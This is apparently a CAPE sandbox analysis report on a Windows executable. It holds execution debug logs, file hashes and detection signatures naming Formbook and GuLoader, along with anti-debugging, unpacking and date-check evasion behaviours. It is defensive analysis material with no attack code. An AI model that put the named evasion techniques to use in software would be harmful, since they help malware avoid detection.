2020-06-05 13:45:32,781 [root] DEBUG: DLL loaded at 0x73110000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-05 13:45:32,796 [root] DEBUG: DLL loaded at 0x73DC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-05 13:45:32,796 [root] DEBUG: DLL unloaded from 0x743C0000.
2020-06-05 13:45:32,796 [root] DEBUG: DLL unloaded from 0x74830000.
2020-06-05 13:45:42,140 [root] DEBUG: DLL unloaded from 0x76160000.
2020-06-05 13:45:42,156 [root] DEBUG: DLL unloaded from 0x77020000.
2020-06-05 13:45:42,156 [root] DEBUG: DLL unloaded from 0x70370000.
2020-06-05 13:45:52,234 [root] DEBUG: DLL unloaded from 0x76640000.
2020-06-05 13:46:01,640 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 13:46:01,656 [root] DEBUG: DLL loaded at 0x735C0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 13:46:01,671 [root] DEBUG: DLL loaded at 0x6D670000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-05 13:46:11,640 [root] DEBUG: DLL unloaded from 0x76160000.
2020-06-05 13:46:11,640 [root] DEBUG: DLL unloaded from 0x77020000.
2020-06-05 13:46:11,640 [root] DEBUG: DLL unloaded from 0x70370000.
2020-06-05 13:46:12,859 [root] DEBUG: CreateThread: Initialising breakpoints for thread 4756.
2020-06-05 13:46:12,859 [root] DEBUG: DLL unloaded from 0x76E70000.
2020-06-05 13:46:12,859 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1e2b0 SEH: ntdll.dll+1e355 0041e2b0, Fault Address: 0041e2b0, Esp: 03baff8c, Exception Code: c0000005,  kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb Bytes at EIP: 55 8b ec 83 ec 64 e8 b5 c8 ff ff 8
2020-06-05 13:46:12,875 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab70 SEH: ntdll.dll+1e355 0041ab70, Fault Address: 0041ab70, Esp: 03baff20, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1e2bb kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb Bytes at EIP: 55 8b ec 81
2020-06-05 13:46:12,875 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1b060 SEH: ntdll.dll+1e355 0041b060, Fault Address: 0041b060, Esp: 03baf278, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1ab96 c6Dqqn8fjGAx.exe+1e2bb kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb By
2020-06-05 13:46:12,875 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+9e40 SEH: ntdll.dll+1e355 00409e40, Fault Address: 00409e40, Esp: 03baf274, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fjGAx.exe+1e2bb kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb Byt
2020-06-05 13:46:12,890 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+187b0 SEH: ntdll.dll+1e355 004187b0, Fault Address: 004187b0, Esp: 03baf254, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fjGAx.exe+1e2bb kernel32.
2020-06-05 13:46:12,890 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1d787 SEH: ntdll.dll+1e355 0041d787, Fault Address: 0041d787, Esp: 03baf240, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+187bf c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fj
2020-06-05 13:46:12,906 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+15da0 SEH: ntdll.dll+1e355 00415da0, Fault Address: 00415da0, Esp: 03baf238, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+187cf c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fj
2020-06-05 13:46:12,921 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+82a0 SEH: ntdll.dll+1e355 004082a0, Fault Address: 004082a0, Esp: 03baf21c, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+15db0 c6Dqqn8fjGAx.exe+187cf c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjG
2020-06-05 13:46:12,937 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+ac70 SEH: ntdll.dll+1e355 0040ac70, Fault Address: 0040ac70, Esp: 03baf0f0, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1871b c6Dqqn8fjGAx.exe+187d5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjG
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+14e90 SEH: ntdll.dll+1e355 00414e90, Fault Address: 00414e90, Esp: 03baf21c, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+9d20 c6Dqqn8fjGAx.exe+187dd c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjG
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0041cfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00419fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00417fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,968 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00416fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,984 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00413fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,984 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00412fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,984 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00411fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,000 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00410fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,000 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040ffff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,000 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040efff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040dfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040cfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040bfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00407fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00406fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00405fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00404fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00403fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00402fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00401fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0041f000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00420000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00421000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00422000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00423000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00424000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00425000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00426000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00427000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,703 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00428000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,734 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00429000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,750 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0042a000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,750 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0042b000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,750 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0042c000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:14,921 [root] DEBUG: CreateThread: Initialising breakpoints for thread 4420.
2020-06-05 13:46:14,921 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 5848).
2020-06-05 13:46:14,921 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x188f4a0.
2020-06-05 13:46:14,937 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 5848
2020-06-05 13:46:14,937 [root] DEBUG: GetHookCallerBase: thread 4420 (handle 0x23c), return address 0x001513DB, allocation base 0x00150000.
2020-06-05 13:46:14,937 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00400000.
2020-06-05 13:46:14,937 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2020-06-05 13:46:14,937 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x00400000.
2020-06-05 13:46:14,937 [root] DEBUG: DumpPE: Empty or inaccessible last section, file image seems incomplete (from 0x00401000 to 0x0042CA00).
2020-06-05 13:46:14,953 [root] INFO: b'C:\\IaUfpVzipc\\CAPE\\5848_1314215590435135562020|5848|0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?'
2020-06-05 13:46:14,953 [root] INFO: cape
2020-06-05 13:46:14,953 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_1314215590435135562020', b'0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?', ['5848'], 'procdump')
2020-06-05 13:46:15,031 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_1314215590435135562020', '', False, 'files')
2020-06-05 13:46:15,046 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0x2ca00.
2020-06-05 13:46:15,062 [root] DEBUG: DLL unloaded from 0x76130000.
2020-06-05 13:46:15,062 [root] WARNING: Unable to open termination event for pid 5848.
2020-06-05 13:46:15,062 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 5848).
2020-06-05 13:46:15,062 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x188f4a0.
2020-06-05 13:48:35,546 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-05 13:48:35,546 [lib.api.process] ERROR: Failed to open terminate event for pid 5596
2020-06-05 13:48:35,546 [root] INFO: Terminate event set for process 5596.
2020-06-05 13:48:35,546 [lib.api.process] ERROR: Failed to open terminate event for pid 5848
2020-06-05 13:48:35,546 [root] INFO: Terminate event set for process 5848.
2020-06-05 13:48:35,546 [root] INFO: Created shutdown mutex.
2020-06-05 13:48:36,546 [root] INFO: Shutting down package.
2020-06-05 13:48:36,546 [root] INFO: Stopping auxiliary modules.
2020-06-05 13:48:36,640 [lib.common.results] WARNING: File C:\IaUfpVzipc\bin\procmon.xml doesn't exist anymore
2020-06-05 13:48:36,640 [root] INFO: Finishing auxiliary modules.
2020-06-05 13:48:36,640 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-05 13:48:36,640 [root] INFO: Uploading files at path "C:\IaUfpVzipc\debugger" 
2020-06-05 13:48:36,656 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_1 win7_1 KVM 2020-06-05 13:56:58 2020-06-05 14:03:56

File Details

File Name c6Dqqn8fjGAx
File Size 81920 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2016-04-21 00:38:38
MD5 5484fdf0fb3f9b032d2ab493c7ac7283
SHA1 7765cfc9f2db46690167113e01b498219401d2e1
SHA256 ee4ae13d3fd3b58d86e270db11937476b4b7add1673983c2c28ed4d7dcc75552
SHA512 d3ba7caec49f1f200971dc8f7f18e267dbd10825cc1ea4ff8cb8c4983d2af27470f0d2316b96589585fa1931d6fc0b4ed76757c8a0a81b2690a3d8c12a347159
CRC32 47E256BC
Ssdeep 1536:ZxDDrdLtwzY/uWK1cwDwvARJKznbASJ8EKc:ZZrdhUY/i1BEYKz/f

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 5848 triggered the Yara rule 'shellcode_get_eip'
Hit: PID 5848 triggered the Yara rule 'shellcode_stack_strings'
Hit: PID 5848 triggered the Yara rule 'Formbook'
Hit: PID 5596 triggered the Yara rule 'shellcode_patterns'
Hit: PID 5596 triggered the Yara rule 'shellcode_get_eip'
Hit: PID 5596 triggered the Yara rule 'HeavensGate'
Hit: PID 5596 triggered the Yara rule 'GuLoader'
Creates RWX memory
NtSetInformationThread: attempt to hide thread from debugger
Possible date expiration check, exits too soon after checking local time
process: c6Dqqn8fjGAx.exe, PID 5596
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDOrCLSIDToTypeLibrary
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: asycfilt.dll/FilterCreateInstance
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: VERSION.DLL/VerQueryValueA
DynamicLoader: VERSION.DLL/GetFileVersionInfoSizeA
DynamicLoader: VERSION.DLL/GetFileVersionInfoA
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
